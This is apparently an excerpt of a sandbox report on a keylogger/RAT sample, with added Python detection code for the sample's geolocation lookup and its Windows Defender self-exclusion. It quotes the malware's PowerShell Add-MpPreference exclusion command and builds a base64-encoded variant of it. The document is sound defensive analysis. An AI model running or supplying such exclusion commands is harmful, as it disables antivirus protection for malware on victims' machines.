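The exchange above is the evidence behind the "Tries to detect the country of the analysis system (by using the IP)" and "HTTP GET or POST without a user agent" signatures: the sample first reads its public address from a "Current IP Check" page, then passes that address to reallyfreegeoip.org and takes the CountryCode out of the XML reply. The following Python is an added example, not code from the report or from the sample. It reproduces the two responses and the request as constructed strings (the XML is closed after the TimeZone element, where the sandbox truncates the capture), parses them the way the malware must, and returns the indicators a network detection would key on. The host set and the finding strings are the example's own.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# Constructed copies of the two responses captured above. The geoip XML is
# closed after <TimeZone>, where the sandbox truncates the capture.
CHECKIP_BODY = (
    "<html><head><title>Current IP Check</title></head>"
    "<body>Current IP Address: 8.46.123.189</body></html>\r\n"
)
GEOIP_XML = (
    "<Response>\n\t<IP>8.46.123.189</IP>\n\t<CountryCode>US</CountryCode>\n"
    "\t<CountryName>United States</CountryName>\n\t<RegionCode>NY</RegionCode>\n"
    "\t<RegionName>New York</RegionName>\n\t<City>New York</City>\n"
    "\t<ZipCode>10118</ZipCode>\n\t<TimeZone>America/New_York</TimeZone>\n</Response>\n"
)
# The request as captured: Host and Connection only, no User-Agent at all.
GEOIP_REQUEST = (
    "GET /xml/8.46.123.189 HTTP/1.1\r\n"
    "Host: reallyfreegeoip.org\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)

# Hosts treated as IP/geolocation services (assumed list; only the host seen
# in the capture is included, extend it for your own environment).
GEOIP_HOSTS = {"reallyfreegeoip.org"}

IP_RE = re.compile(r"Current IP Address:\s*((?:\d{1,3}\.){3}\d{1,3})")


def parse_checkip(body: str) -> Optional[str]:
    """Extract the public IP from the 'Current IP Check' page body."""
    m = IP_RE.search(body)
    return m.group(1) if m else None


def parse_geoip(xml_text: str) -> Dict[str, str]:
    """Flatten the <Response> document into {tag: text}."""
    root = ET.fromstring(xml_text)
    if root.tag != "Response":
        raise ValueError("unexpected root element %r" % root.tag)
    return {child.tag: (child.text or "").strip() for child in root}


def parse_request(raw: str):
    """Minimal HTTP/1.1 parser: (method, path, {lower-case header name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def flag_geolocation_lookup(raw_request: str, external_ip: Optional[str]) -> List[str]:
    """Return the indicators a network detection would raise on this request."""
    _method, path, headers = parse_request(raw_request)
    findings: List[str] = []
    host = headers.get("host", "")
    if host in GEOIP_HOSTS:
        findings.append("geolocation lookup to %s" % host)
    if "user-agent" not in headers:
        findings.append("no User-Agent header")
    if external_ip and external_ip in path:
        findings.append("path carries the previously fetched external IP %s" % external_ip)
    return findings


def analyse(checkip_body: str, raw_request: str, geoip_xml: str) -> Dict[str, object]:
    """Chain the two lookups the way the sample does and summarise the result."""
    ip = parse_checkip(checkip_body)
    findings = flag_geolocation_lookup(raw_request, ip)
    geo = parse_geoip(geoip_xml)
    return {"external_ip": ip, "country": geo.get("CountryCode"), "findings": findings}


if __name__ == "__main__":
    print(analyse(CHECKIP_BODY, GEOIP_REQUEST, GEOIP_XML))
```

A proxy or IDS rule built on this logic should fire on the combination (request to a geolocation service, no User-Agent, the path carrying an address the host just learned from another lookup) rather than on the domain alone, since legitimate software also uses these services.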



                                                      Target ID:0
                                                      Start time:22:01:13
                                                      Start date:18/02/2025
                                                      Path:C:\Users\user\Desktop\rPO2400525.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\rPO2400525.exe"
                                                      Imagebase:0x240000
                                                      File size:626'688 bytes
                                                      MD5 hash:9393C3E2268FE4C15DA55F0D5233245D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:22:01:14
                                                      Start date:18/02/2025
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe"
                                                      Imagebase:0x110000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:22:01:14
                                                      Start date:18/02/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:22:01:14
                                                      Start date:18/02/2025
                                                      Path:C:\Users\user\Desktop\rPO2400525.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\rPO2400525.exe"
                                                      Imagebase:0x9b0000
                                                      File size:626'688 bytes
                                                      MD5 hash:9393C3E2268FE4C15DA55F0D5233245D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.3321986255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:6
                                                      Start time:22:01:17
                                                      Start date:18/02/2025
                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x7ff6ef0c0000
                                                      File size:496'640 bytes
                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true
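Target ID 3 is the behaviour behind the "Adds a directory exclusion to Windows Defender" signature: the sample spawns powershell.exe with Add-MpPreference -ExclusionPath pointing at its own image, so that Defender stops scanning the file that is already running (the SysWOW64 image path next to a System32 path in the command line is ordinary WoW64 file-system redirection for a 32-bit parent, not tampering). The Sigma rule listed in the overview also covers the base64-encoded form of the same cmdlet. The following Python is an added example, not part of the report: it runs a parent/child detection over constructed process-creation events modelled on Target IDs 0 and 3, decodes an -EncodedCommand payload before matching, and reports whether the excluded path is the parent process's own image. The event field names and the encoded third event are the example's own assumptions.

```python
import base64
import ntpath
import re
from typing import Dict, List

# Constructed process-creation events modelled on Target IDs 0 and 3 above.
# Field names are the example's own, not the sandbox's. The third event is an
# assumed variant that hides the same cmdlet behind -EncodedCommand (UTF-16LE
# base64, as PowerShell expects it).
ENCODED_PAYLOAD = base64.b64encode(
    r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe"'.encode("utf-16-le")
).decode("ascii")

EVENTS = [
    {"pid": 1, "ppid": 0,
     "image": r"C:\Users\user\Desktop\rPO2400525.exe",
     "cmdline": r'"C:\Users\user\Desktop\rPO2400525.exe"'},
    {"pid": 2, "ppid": 1,
     # Image is under SysWOW64 while the command line names System32: WoW64 redirection.
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe"'},
    {"pid": 3, "ppid": 1,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED_PAYLOAD},
]

# Add-/Set-MpPreference combined with one of the exclusion parameters.
MPPREF_RE = re.compile(r"(?i)\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\b")
# Value following an exclusion parameter: "quoted", 'quoted' or bare.
EXCL_VALUE_RE = re.compile(r"""(?i)-Exclusion(?:Path|Process|Extension)\s+(?:"([^"]+)"|'([^']+)'|(\S+))""")
# -e, -ec, -en, -enc or -EncodedCommand followed by a base64 blob. The suffix
# alternation is closed so that -ExclusionPath and -ExecutionPolicy do not match.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n(?:c(?:odedcommand)?)?)?\s+([A-Za-z0-9+/=]{16,})")


def expand_cmdline(cmdline: str) -> str:
    """Append the decoded text of any -EncodedCommand payload to the command line."""
    parts = [cmdline]
    for m in ENC_RE.finditer(cmdline):
        try:
            parts.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not base64 / not UTF-16LE: keep only the raw line
    return "\n".join(parts)


def is_powershell(image: str) -> bool:
    # Match on the basename so the SysWOW64 and System32 copies are treated alike.
    return ntpath.basename(image).lower() in ("powershell.exe", "pwsh.exe")


def excluded_paths(text: str) -> List[str]:
    """Every value passed to an -Exclusion* parameter, quotes stripped."""
    return [next(g for g in groups if g) for groups in EXCL_VALUE_RE.findall(text)]


def detect_defender_exclusion(events: List[Dict]) -> List[Dict]:
    """Flag PowerShell children that add Defender exclusions and note when the
    excluded path is the parent's own image (self-exclusion, as in Target ID 3)."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if not is_powershell(e["image"]):
            continue
        text = expand_cmdline(e["cmdline"])
        if not MPPREF_RE.search(text):
            continue
        parent = by_pid.get(e["ppid"])
        paths = excluded_paths(text)
        excludes_parent = parent is not None and any(
            p.lower() == parent["image"].lower() for p in paths)
        hits.append({
            "pid": e["pid"],
            "parent_image": parent["image"] if parent else None,
            "excluded": paths,
            "excludes_parent": excludes_parent,
            "encoded": text != e["cmdline"],
        })
    return hits


if __name__ == "__main__":
    for hit in detect_defender_exclusion(EVENTS):
        print(hit)
```

On a live host the same evidence is visible with Get-MpPreference (ExclusionPath) and is undone with Remove-MpPreference -ExclusionPath; the exclusion outlives the process that created it, so an incident response for this sample has to remove it explicitly rather than just killing the process tree.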
